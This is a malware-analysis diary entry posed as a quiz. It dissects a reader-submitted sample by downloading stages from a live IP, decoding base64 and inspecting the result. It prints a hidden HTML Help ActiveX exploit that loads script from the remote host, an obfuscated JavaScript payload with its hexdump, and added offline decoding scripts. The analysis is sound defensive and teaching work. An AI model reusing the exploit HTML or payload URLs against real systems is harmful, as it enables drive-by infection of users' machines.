Malware quiz
Some new malware sent in by a reader. Spaces and line breaks added
for readability and to prevent the accidental click. The question is, what
is the malware, and what exploits were used?
Disclaimer: this is live malware; your anti-virus may trigger. I wouldn't recommend
running it anywhere except an isolated VMware system.
Download the first beastie:
wget http:// 85.255.117.34 / cnt9_dycht5g.htm
What is it?:
file cnt9_dycht5g.htm
cnt9_dycht5g.htm: news or mail text
Check out the contents:
head cnt9_dycht5g.htm
From: <x>
Subject: x
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64
Try to decode it:
base64 -d cnt9_dycht5g.htm > yada.out
Illegal character ':' in input file.
Strip the illegal characters and try again:
base64 -d cnt9_dycht5g.htm > yada.out
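As an added example (not the diary's own code), here is a small decoder that handles the mail-style wrapper itself instead of stripping characters by hand: it reports the first character outside the base64 alphabet (the ':' in the header lines is what base64 -d tripped over), splits the header block from the body at the first blank line, and decodes the body only if Content-Transfer-Encoding says base64. The message is constructed inline with a placeholder body; it assumes the headers end with a blank line as in ordinary mail, which the head output above does not show. SAMPLE_MESSAGE, splitMessage, decodeMimeBase64 and firstIllegalBase64Char are names chosen here.

```javascript
// Added example, not from the diary: decode a base64 body that is wrapped in
// mail-style headers, the situation "base64 -d" choked on above. The message
// below is constructed inline; its body is just a placeholder HTML page.
const SAMPLE_HTML = "<HTML><BODY>constructed first-stage placeholder</BODY></HTML>";
const SAMPLE_MESSAGE =
  "From: <x>\n" +
  "Subject: x\n" +
  "MIME-Version: 1.0\n" +
  'Content-Type: text/html; charset="utf-8"\n' +
  "Content-Transfer-Encoding: base64\n" +
  "\n" + // blank line ends the header block (assumed, as in ordinary mail)
  (Buffer.from(SAMPLE_HTML).toString("base64").match(/.{1,76}/g) || []).join("\n") + "\n";

// Return the first character that is not legal base64 (or whitespace), or null.
// Fed the raw file, this stops at the ':' in "From:", which is what the CLI reported.
function firstIllegalBase64Char(text) {
  const m = /[^A-Za-z0-9+\/=\s]/.exec(text);
  return m ? m[0] : null;
}

// Split the header block from the body at the first blank line and parse
// "Name: value" headers (names lower-cased). Folded continuation lines are
// appended to the previous header.
function splitMessage(text) {
  const idx = text.search(/\r?\n\r?\n/);
  const headerText = idx < 0 ? text : text.slice(0, idx);
  const body = idx < 0 ? "" : text.slice(idx).replace(/^\r?\n\r?\n/, "");
  const headers = {};
  let last = null;
  for (const line of headerText.split(/\r?\n/)) {
    if (/^\s/.test(line) && last) { headers[last] += " " + line.trim(); continue; }
    const m = /^([^:]+):\s*(.*)$/.exec(line);
    if (!m) continue;
    last = m[1].trim().toLowerCase();
    headers[last] = m[2];
  }
  return { headers, body };
}

// Decode the body according to Content-Transfer-Encoding and hand back the
// headers alongside the decoded HTML, refusing bodies that are not clean base64.
function decodeMimeBase64(text) {
  const { headers, body } = splitMessage(text);
  const cte = (headers["content-transfer-encoding"] || "").toLowerCase();
  if (cte !== "base64") throw new Error(`unsupported transfer encoding: ${cte || "(none)"}`);
  const bad = firstIllegalBase64Char(body);
  if (bad !== null) throw new Error(`illegal character '${bad}' in base64 body`);
  return { headers, html: Buffer.from(body, "base64").toString("utf8") };
}

// Stand-alone run: show why the raw file fails and what the body decodes to.
console.log("raw file, first illegal char:", JSON.stringify(firstIllegalBase64Char(SAMPLE_MESSAGE)));
console.log(decodeMimeBase64(SAMPLE_MESSAGE).html);
```

Run it with node; to use it on the real file, read the file into a string and pass it to decodeMimeBase64 in place of SAMPLE_MESSAGE. Refusing a body with stray characters, rather than silently skipping them the way Node's Buffer would, keeps a damaged or deliberately padded download from decoding into something subtly wrong.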
What's in there?:
file yada.out
yada.out: HTML document text
HTML, let's take a looksee:
cat yada.out
< !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
< HTML>< BODY>
< OBJECT style="display:none" id="adswqe" classid="clsid:adb880a6-d8ff-
11cf-9377-00aa003b7a11">
< PARAM name="Command" value="Related Topics, MENU">
< PARAM name="Button" value="Text:_">
< PARAM name="Window" value="$global_blank">
< PARAM name="Item1" value="
command;ms-its:c:/windows/help/ ntshared.chm:
:/alt_url_enterprise_specific.htm">
< /OBJECT>
< OBJECT style="display:none" id="adswqer" classid="clsid:adb880a6-d
8ff-11cf-9377-00aa003b7a11">
< PARAM name="Command" value="Related Topics, MENU">
< PARAM name="Button" value="Text:_">
< PARAM name="Window" value="$global_blank">
< PARAM name="Item1" value='command; javascript:execScript("document.write(\"<
script src=http:// 85.255.117.34 / cnt9.jpg
\"+String.fromCharCode(62)+\"</scr
\"+\"ipt\"+String.fromCharCode(62))")'>
< /OBJECT>
< script>adswqe.HHClick(); var vv=''; setTimeout("adswqer.HH
Click()",101); setTimeout("document.write(vv)",202); </script>
< /BODY>< /HTML>
Download the next beastie:
wget http:// 85.255.117.34 / cnt9.jpg
and voila, malware:
Scanner Version Updated Result
AntiVir 6.34.0.53 03.13.2006 no virus found
Avast 4.6.695.0 03.10.2006 no virus found
AVG 718 03.10.2006 no virus found
Avira 6.34.0.53 03.13.2006 no virus found
BitDefender 7.2 03.13.2006 no virus found
CAT-QuickHeal 8.00 03.13.2006 no virus found
ClamAV devel-20060126 03.11.2006 Trojan.Downloader.VBS.Phel.I
DrWeb 4.33 03.13.2006 VBS.Psyme.114
eTrust-InoculateIT 23.71.100 03.12.2006 no virus found
eTrust-Vet 12.4.2115 03.10.2006 no virus found
Ewido 3.5 03.13.2006 no virus found
Fortinet 2.71.0.0 03.12.2006 VBS/Phel.I-tr
F-Prot 3.16c 03.11.2006 no virus found
Ikarus 0.2.59.0 03.10.2006 no virus found
Kaspersky 4.0.2.24 03.13.2006 no virus found
McAfee 4716 03.11.2006 VBS/Psyme
NOD32v2 1.1440 03.12.2006 no virus found
Norman 5.70.10 03.10.2006 no virus found
Panda 9.0.0.4 03.12.2006 no virus found
Sophos 4.03.0 03.13.2006 no virus found
Symantec 8.0 03.13.2006 Download.Trojan
TheHacker 5.9.5.112 03.13.2006 no virus found
UNA 1.83 03.10.2006 no virus found
VBA32 3.10.5 03.13.2006 no virus found
So what are we?
file cnt9.jpg
cnt9.jpg: data
The strings in the file are:
strings cnt9.jpg
s="C
RFLHHROO
NNAruC
AruC
\r\r
\r_\r
_B_<\r
MQ']T]237]T]++/]V_E_
_]8]T]:+]S]
EPPGJQMJJQNNHQLKP
\r]T]
]V_E_
BN_E_
_]<E]T]#]T]
]SM_A_
]XAruCP
AruruC
WVruCP
A";for(i=0;i<555;i++)s=s.substr(1)+String.fromCharCode(127-s.charCodeAt(0));document.write(s);
How about a hexdump?
hexdump -C cnt9.jpg
00000000 73 3d 22 43 10 1d 15 1a 1c 0b 5f 16 1b 42 1e 5f |s="C......_..B._|
00000010 1c 13 1e 0c 0c 16 1b 42 1c 13 0c 16 1b 45 1e 1b |.......B.....E..|
00000020 1d 47 47 4f 1e 49 52 1b 47 19 19 52 4e 4e 1c 19 |.GGO.IR.G..RNN..|
00000030 52 46 4c 48 48 52 4f 4f 1e 1e 4f 4f 4c 1d 48 1e |RFLHHROO..OOL.H.|
00000040 4e 4e 41 72 75 43 0f 1e 5c 72 1e 12 5f 11 1e 12 |NNAruC..\r.._...|
00000050 1a 42 1c 10 12 12 1e 11 1b 5f 09 1e 13 5c 6e 1a |.B......._...\n.|
00000060 42 0c 17 10 5c 72 0b 1c 5c 6e 0b 41 72 75 43 0f |B...\r..\n.AruC.|
00000070 1e 5c 72 1e 12 5f 11 1e 12 1a 42 16 0b 1a 12 4e |.\r.._....B....N|
00000080 5f 09 1e 13 5c 6e 1a 42 58 53 1c 12 1b 51 1a 07 |_...\n.BXS...Q..|
00000090 1a 53 50 1c 5f 0c 0b 1e 5c 72 0b 5f 50 12 16 11 |.SP._...\r._P...|
000000a0 5f 1c 12 1b 51 1a 07 1a 5f 50 1c 5f 5d 1a 1c 17 |_...Q..._P._]...|
000000b0 10 5f 10 11 5f 1a 5c 72 5c 72 10 5c 72 5f 5c 72 |._.._.\r\r.\r_\r|
000000c0 1a 0c 5c 6e 12 1a 5f 11 1a 07 0b 5f 45 5f 0c 1a |..\n.._...._E_..|
000000d0 0b 5f 10 5f 42 5f 3c 5c 72 1a 1e 0b 1a 30 1d 15 |._._B_<\r....0..|
000000e0 1a 1c 0b 57 5d 12 0c 07 12 5d 54 5d 13 4d 51 27 |...W]....]T].MQ'|
000000f0 5d 54 5d 32 33 37 5d 54 5d 2b 2b 2f 5d 56 5f 45 |]T]237]T]++/]V_E|
00000100 5f 10 51 10 0f 1a 11 5f 5d 38 5d 54 5d 3a 2b 5d |_.Q...._]8]T]:+]|
00000110 53 5d 17 0b 0b 0f 45 50 50 47 4a 51 4d 4a 4a 51 |S]....EPPGJQMJJQ|
00000120 4e 4e 48 51 4c 4b 50 1c 11 0b 46 51 18 16 19 5d |NNHQLKP...FQ...]|
00000130 53 39 1e 13 0c 1a 5f 45 5f 10 51 0c 1a 11 1b 5f |S9...._E_.Q...._|
00000140 45 5f 0c 1a 0b 5f 0c 5f 42 5f 1c 5c 72 1a 1e 0b |E_..._._B_.\r...|
00000150 1a 10 1d 15 1a 1c 0b 57 5d 1e 1b 10 1b 5d 54 5d |.......W]....]T]|
00000160 1d 51 0c 0b 5c 72 5d 54 5d 1a 1e 12 5d 56 5f 45 |.Q..\r]T]...]V_E|
00000170 5f 0c 51 0b 06 0f 1a 42 4e 5f 45 5f 0c 51 10 0f |_.Q....BN_E_.Q..|
00000180 1a 11 5f 45 5f 0c 51 08 5c 72 16 0b 1a 5f 10 51 |.._E_.Q.\r..._.Q|
00000190 5c 72 1a 0c 0f 10 11 0c 1a 3d 10 1b 06 5f 45 5f |\r.......=..._E_|
000001a0 0c 51 0c 1e 09 1a 0b 10 19 16 13 1a 5f 5d 3c 45 |.Q.........._]<E|
000001b0 5d 54 5d 23 5d 54 5d 14 51 1a 5d 54 5d 07 1a 5d |]T]#]T].Q.]T]..]|
000001c0 53 4d 5f 41 5f 1c 45 23 1c 51 09 1d 0c 59 59 08 |SM_A_.E#.Q...YY.|
000001d0 0c 1c 5c 72 16 0f 0b 5f 1c 45 23 1c 51 09 1d 0c |..\r..._.E#.Q...|
000001e0 59 59 1b 1a 13 5f 1c 45 23 1c 51 09 1d 0c 59 59 |YY..._.E#.Q...YY|
000001f0 16 19 5f 1a 07 16 0c 0b 5f 1c 45 23 14 51 1a 07 |.._....._.E#.Q..|
00000200 1a 5f 0c 0b 1e 5c 72 0b 5f 1c 45 23 14 51 1a 07 |._...\r._.E#.Q..|
00000210 1a 5d 58 41 72 75 43 50 10 1d 15 1a 1c 0b 41 72 |.]XAruCP......Ar|
00000220 75 72 75 43 0c 1c 5c 72 16 0f 0b 41 72 75 1e 51 |uruC..\r...Aru.Q|
00000230 3c 13 16 1c 14 57 56 72 75 43 50 0c 1c 5c 72 16 |<....WVruCP..\r.|
00000240 0f 0b 41 22 3b 66 6f 72 28 69 3d 30 3b 69 3c 35 |..A";for(i=0;i<5|
00000250 35 35 3b 69 2b 2b 29 73 3d 73 2e 73 75 62 73 74 |55;i++)s=s.subst|
00000260 72 28 31 29 2b 53 74 72 69 6e 67 2e 66 72 6f 6d |r(1)+String.from|
00000270 43 68 61 72 43 6f 64 65 28 31 32 37 2d 73 2e 63 |CharCode(127-s.c|
00000280 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 64 6f |harCodeAt(0));do|
00000290 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 73 29 3b |cument.write(s);|
000002a0
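The loop at the tail of the file is the whole decoder: 555 times it drops the first character of s and appends the character whose code is 127 minus the dropped one's, then writes the result into the page. As an added example that is not part of the diary, the script below parses hexdump -C output back into bytes, pulls the s="..." literal out (turning the two-byte \r and \n escapes into CR and LF the way the script engine would before the loop runs), and decodes it both with the malware's own rotate-and-transform loop and with the equivalent per-character map. Counting the dump above, the literal is 576 bytes holding 21 such escapes, i.e. 555 characters, which is exactly the loop bound, so every character is transformed once and lands back in its original position. Only the first seven rows are transcribed here as a constructed sample; paste the full dump into HEXDUMP to decode the whole file. HEXDUMP, parseHexdump, extractStringLiteral, decodeByRotation, decodeDirect and decodeSample are names chosen here.

```javascript
// Added example, not from the diary: reverse the obfuscation in cnt9.jpg
// offline. The loop in the file rotates one character off the front of s and
// appends String.fromCharCode(127 - code) to the back, 555 times. Only the
// first seven rows of the diary's hexdump are transcribed here (constructed
// sample); paste the complete dump into HEXDUMP to decode the whole file.
const HEXDUMP = String.raw`
00000000 73 3d 22 43 10 1d 15 1a 1c 0b 5f 16 1b 42 1e 5f |s="C......_..B._|
00000010 1c 13 1e 0c 0c 16 1b 42 1c 13 0c 16 1b 45 1e 1b |.......B.....E..|
00000020 1d 47 47 4f 1e 49 52 1b 47 19 19 52 4e 4e 1c 19 |.GGO.IR.G..RNN..|
00000030 52 46 4c 48 48 52 4f 4f 1e 1e 4f 4f 4c 1d 48 1e |RFLHHROO..OOL.H.|
00000040 4e 4e 41 72 75 43 0f 1e 5c 72 1e 12 5f 11 1e 12 |NNAruC..\r.._...|
00000050 1a 42 1c 10 12 12 1e 11 1b 5f 09 1e 13 5c 6e 1a |.B......._...\n.|
00000060 42 0c 17 10 5c 72 0b 1c 5c 6e 0b 41 72 75 43 0f |B...\r..\n.AruC.|
`;

// Parse "hexdump -C" output back into bytes: take the hex field of every
// offset line and ignore the ASCII column, the final bare offset and "*" lines.
function parseHexdump(text) {
  const bytes = [];
  for (const rawLine of text.split("\n")) {
    const fields = rawLine.split("|")[0].trim().split(/\s+/);
    if (!/^[0-9a-fA-F]{8}$/.test(fields[0])) continue;
    for (const h of fields.slice(1)) if (h) bytes.push(parseInt(h, 16));
  }
  return bytes;
}

// The file stores s as a JavaScript string literal, so "\r" and "\n" in the
// bytes are two-character escapes that the script engine turns into CR and LF
// before the loop runs. Pull the literal out and apply those escapes.
function extractStringLiteral(bytes) {
  const src = bytes.map((b) => String.fromCharCode(b)).join("");
  const start = src.indexOf('s="');
  if (start < 0) throw new Error('no s="..." literal found');
  const escapes = { r: "\r", n: "\n", t: "\t" };
  let out = "";
  for (let i = start + 3; i < src.length && src[i] !== '"'; i++) {
    if (src[i] === "\\" && i + 1 < src.length) {
      const e = src[++i];
      out += e in escapes ? escapes[e] : e; // \\ and \" become the char itself
    } else {
      out += src[i];
    }
  }
  return out; // on a truncated dump there is no closing quote: runs to the end
}

// The malware's own decoder, as written in the file: rotate and transform.
function decodeByRotation(s, rounds) {
  for (let i = 0; i < rounds; i++) s = s.substr(1) + String.fromCharCode(127 - s.charCodeAt(0));
  return s;
}

// When rounds equals s.length every character is transformed exactly once and
// ends up back where it started, so the loop collapses to a per-character map.
function decodeDirect(s) {
  return Array.from(s, (ch) => String.fromCharCode(127 - ch.charCodeAt(0))).join("");
}

// Decode the transcribed sample both ways and check that they agree. The real
// literal is 555 characters long (576 bytes minus 21 two-byte escapes), which
// is exactly the loop bound, so on the full file the same check holds.
function decodeSample() {
  const literal = extractStringLiteral(parseHexdump(HEXDUMP));
  const direct = decodeDirect(literal);
  if (decodeByRotation(literal, literal.length) !== direct) throw new Error("decoders disagree");
  return direct;
}

console.log(JSON.stringify(decodeSample()));
```

Run it with node. Decoding statically like this, rather than letting document.write run, is the point: the result is a string you can read, grep for class ids and URLs, and hand to an AV vendor, and nothing executes. If you paste the complete dump in, pass 555 (or literal.length, which should match) to decodeByRotation; on the truncated sample the rotation count has to be the sample's own length or the output comes out scrambled.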
So, what did we end up with?
Thanks to Mark for writing in with the malware du jour.
Bonus points for figuring out anything I missed, or didn't include here!
Cheers,
Adrien
The fine print: no oompah loompahs were harmed in any way in the
creation of this diary entry.